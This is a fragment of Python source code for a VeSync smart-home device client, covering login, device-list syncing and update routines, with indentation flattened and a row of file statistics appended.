'outlets': self.outlets,
'switches': self.switches,
'bulbs': self.bulbs
}
if isinstance(time_zone, str) and time_zone:
reg_test = r'[^a-zA-Z/_]'
if bool(re.search(reg_test, time_zone)):
self.time_zone = DEFAULT_TZ
logger.debug('Invalid characters in time zone - %s',
time_zone)
else:
self.time_zone = time_zone
else:
self.time_zone = DEFAULT_TZ
logger.debug('Time zone is not a string')
@property
def energy_update_interval(self) -> int:
"""Return energy update interval."""
return self._energy_update_interval
@energy_update_interval.setter
def energy_update_interval(self, new_energy_update: int) -> None:
"""Set energy update interval in seconds."""
if new_energy_update > 0:
self._energy_update_interval = new_energy_update
@staticmethod
def remove_dev_test(device, new_list: list) -> bool:
"""Test if device should be removed - False = Remove."""
if isinstance(new_list, list) and device.cid:
for item in new_list:
device_found = False
if 'cid' in item:
if device.cid == item['cid']:
device_found = True
break
else:
logger.debug('No cid found in - %s', str(item))
if not device_found:
logger.debug(
'Device removed - %s - %s',
device.device_name, device.device_type
)
return False
return True
def add_dev_test(self, new_dev: dict) -> bool:
"""Test if new device should be added - True = Add."""
if 'cid' in new_dev:
for _, v in self._dev_list.items():
for dev in v:
if (
dev.cid == new_dev.get('cid')
and new_dev.get('subDeviceNo', 0) == dev.sub_device_no
):
return False
return True
def remove_old_devices(self, devices: list) -> bool:
"""Remove devices not found in device list return."""
for k, v in self._dev_list.items():
before = len(v)
v[:] = [x for x in v if self.remove_dev_test(x, devices)]
after = len(v)
if before != after:
logger.debug('%s %s removed', str((before - after)), k)
return True
@staticmethod
def set_dev_id(devices: list) -> list:
"""Correct devices without cid or uuid."""
dev_num = 0
dev_rem = []
for dev in devices:
if dev.get('cid') is None:
if dev.get('macID') is not None:
dev['cid'] = dev['macID']
elif dev.get('uuid') is not None:
dev['cid'] = dev['uuid']
else:
dev_rem.append(dev_num)
logger.warning('Device with no ID - %s',
dev.get('deviceName'))
dev_num += 1
if dev_rem:
devices = [i for j, i in enumerate(
devices) if j not in dev_rem]
return devices
def process_devices(self, dev_list: list) -> bool:
"""Instantiate Device Objects."""
devices = VeSync.set_dev_id(dev_list)
num_devices = 0
for _, v in self._dev_list.items():
if isinstance(v, list):
num_devices += len(v)
else:
num_devices += 1
if not devices:
logger.warning('No devices found in api return')
return False
if num_devices == 0:
logger.debug('New device list initialized')
else:
self.remove_old_devices(devices)
devices[:] = [x for x in devices if self.add_dev_test(x)]
detail_keys = ['deviceType', 'deviceName', 'deviceStatus']
for dev in devices:
if not all(k in dev for k in detail_keys):
logger.debug('Error adding device')
continue
dev_type = dev.get('deviceType')
try:
device_str, device_obj = object_factory(dev_type, dev, self)
device_list = getattr(self, device_str)
device_list.append(device_obj)
except AttributeError as err:
logger.debug('Error - %s', err)
logger.debug('%s device not added', dev_type)
continue
return True
def get_devices(self) -> bool:
"""Return tuple listing outlets, switches, and fans of devices."""
if not self.enabled:
return False
self.in_process = True
proc_return = False
response, _ = Helpers.call_api(
'/cloud/v1/deviceManaged/devices',
'post',
headers=Helpers.req_headers(self),
json=Helpers.req_body(self, 'devicelist'),
)
if response and Helpers.code_check(response):
if 'result' in response and 'list' in response['result']:
device_list = response['result']['list']
if self.debug:
logger.debug(str(device_list))
proc_return = self.process_devices(device_list)
else:
logger.error('Device list in response not found')
else:
logger.warning('Error retrieving device list')
self.in_process = False
return proc_return
def login(self) -> bool:
"""Return True if log in request succeeds."""
user_check = isinstance(self.username, str) and len(self.username) > 0
pass_check = isinstance(self.password, str) and len(self.password) > 0
if user_check is False:
logger.error('Username invalid')
return False
if pass_check is False:
logger.error('Password invalid')
return False
response, _ = Helpers.call_api(
'/cloud/v1/user/login', 'post',
json=Helpers.req_body(self, 'login')
)
if Helpers.code_check(response) and 'result' in response:
self.token = response.get('result').get('token')
self.account_id = response.get('result').get('accountID')
self.enabled = True
return True
logger.error('Error logging in with username and password')
return False
def device_time_check(self) -> bool:
"""Test if update interval has been exceeded."""
if (
self.last_update_ts is None
or (time.time() - self.last_update_ts) > self.update_interval
):
return True
return False
def update(self) -> None:
"""Fetch updated information about devices."""
if self.device_time_check():
if not self.enabled:
logger.error('Not logged in to VeSync')
return
self.get_devices()
devices = list(self._dev_list.values())
for device in chain(*devices):
device.update()
self.last_update_ts = time.time()
def update_energy(self, bypass_check=False) -> None:
"""Fetch updated energy information about devices."""
if self.outlets:
for outlet in self.outlets:
outlet.update_energy(bypass_check)
def update_all_devices(self) -> None:
"""Run get_details() for each device."""
devices = list(self._dev_list.keys())
for dev in chain(*devices):
dev.get_details()
| 35.94586 | 78 | 0.57234 | 1,343 | 11,287 | 4.624721 | 0.160089 | 0.022541 | 0.018838 | 0.028981 | 0.196748 | 0.105941 | 0.070681 | 0.053293 | 0.024473 | 0 | 0 | 0.008753 | 0.331975 | 11,287 | 313 | 79 | 36.060703 | 0.814987 | 0.084345 | 0 | 0.170635 | 0 | 0 | 0.07554 | 0.003029 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075397 | false | 0.031746 | 0.059524 | 0 | 0.230159 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |